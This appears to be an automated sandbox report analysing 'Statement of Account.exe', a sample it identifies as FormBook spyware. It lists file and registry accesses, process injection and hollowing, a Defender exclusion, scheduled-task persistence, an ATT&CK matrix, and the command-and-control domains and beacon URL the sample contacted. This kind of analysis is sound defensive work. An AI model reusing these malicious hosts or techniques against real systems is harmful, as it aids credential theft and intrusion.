          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeQueries volume information: C:\Users\user\AppData\Roaming\SIZfuXT.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		712
          Process Injection          		1
          Masquerading          		OS Credential Dumping321
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Scheduled Task/Job          		11
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook712
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          System Network Connections Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information          		Cached Domain Credentials2
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc Filesystem212
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543876 Sample: Statement of Account.exe Startdate: 28/10/2024 Architecture: WINDOWS Score: 100 59 www.yzq0n.top 2->59 61 www.urgaslotvip.website 2->61 63 9 other IPs or domains 2->63 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 13 other signatures 2->83 11 Statement of Account.exe 7 2->11         started        15 SIZfuXT.exe 5 2->15         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\SIZfuXT.exe, PE32 11->51 dropped 53 C:\Users\user\...\SIZfuXT.exe:Zone.Identifier, ASCII 11->53 dropped 55 C:\Users\user\AppData\Local\...\tmpC2DD.tmp, XML 11->55 dropped 57 C:\Users\...\Statement of Account.exe.log, ASCII 11->57 dropped 93 Writes to foreign memory regions 11->93 95 Allocates memory in foreign processes 11->95 97 Adds a directory exclusion to Windows Defender 11->97 99 Injects a PE file into a foreign processes 11->99 17 vbc.exe 11->17         started        20 powershell.exe 23 11->20         started        22 schtasks.exe 1 11->22         started        101 Antivirus detection for dropped file 15->101 103 Multi AV Scanner detection for dropped file 15->103 105 Machine Learning detection for dropped file 15->105 24 vbc.exe 15->24         started        26 schtasks.exe 1 15->26         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 17->67 69 Maps a DLL or memory area into another process 17->69 71 Sample uses process hollowing technique 17->71 75 3 other signatures 17->75 28 explorer.exe 69 1 17->28 injected 73 Loading BitLocker PowerShell Module 20->73 32 WmiPrvSE.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        38 conhost.exe 26->38         started        process9 dnsIp10 65 www.irex.info 85.13.166.18, 49980, 80 NMM-ASD-02742FriedersdorfHauptstrasse68DE Germany 28->65 107 Uses netstat to query active network connections and open ports 28->107 109 Uses ipconfig to lookup or modify the Windows network settings 28->109 40 NETSTAT.EXE 28->40         started        43 ipconfig.exe 28->43         started        45 autochk.exe 28->45         started        signatures11 process12 signatures13 85 Modifies the context of a thread in another process (thread injection) 40->85 87 Maps a DLL or memory area into another process 40->87 89 Tries to detect virtualization through RDTSC time measurements 40->89 91 Switches to a custom stack to bypass stack traces 40->91 47 cmd.exe 40->47         started        process14 process15 49 conhost.exe 47->49         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Statement of Account.exe76%ReversingLabsByteCode-MSIL.Spyware.Negasteal
          Statement of Account.exe100%AviraTR/AD.Swotter.zvmla
          Statement of Account.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\SIZfuXT.exe100%AviraTR/AD.Swotter.zvmla
          C:\Users\user\AppData\Roaming\SIZfuXT.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\SIZfuXT.exe76%ReversingLabsByteCode-MSIL.Spyware.Negasteal

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://aka.ms/odirmr0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://www.fontbureau.com/designers0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
          https://wns.windows.com/L0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
          http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
          https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
          http://www.fontbureau.com/designersG0%URL Reputationsafe
          http://www.fontbureau.com/designers/?0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.com/designers?0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://api.msn.com/q0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
          http://www.fonts.com0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.irex.info
          		85.13.166.18
          		truetrue
            		unknown
            www.eb777.club
            		unknown
            		unknowntrue
              		unknown
              www.leachlondonstore.online
              		unknown
              		unknowntrue
                		unknown
                www.sed-cars-89003.bond
                		unknown
                		unknowntrue
                  		unknown
                  www.f6b-crxy.top
                  		unknown
                  		unknowntrue
                    		unknown
                    www.azino-forum-pro.online
                    		unknown
                    		unknowntrue
                      		unknown
                      www.kdsclci.bond
                      		unknown
                      		unknowntrue
                        		unknown
                        www.urgaslotvip.website
                        		unknown
                        		unknowntrue
                          		unknown
                          www.yzq0n.top
                          		unknown
                          		unknowntrue
                            		unknown
                            www.hopp9.top
                            		unknown
                            		unknowntrue
                              		unknown
                              www.nd-los.net
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.f6b-crxy.top/cu29/true
                                  		unknown
                                  http://www.irex.info/cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNTtrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
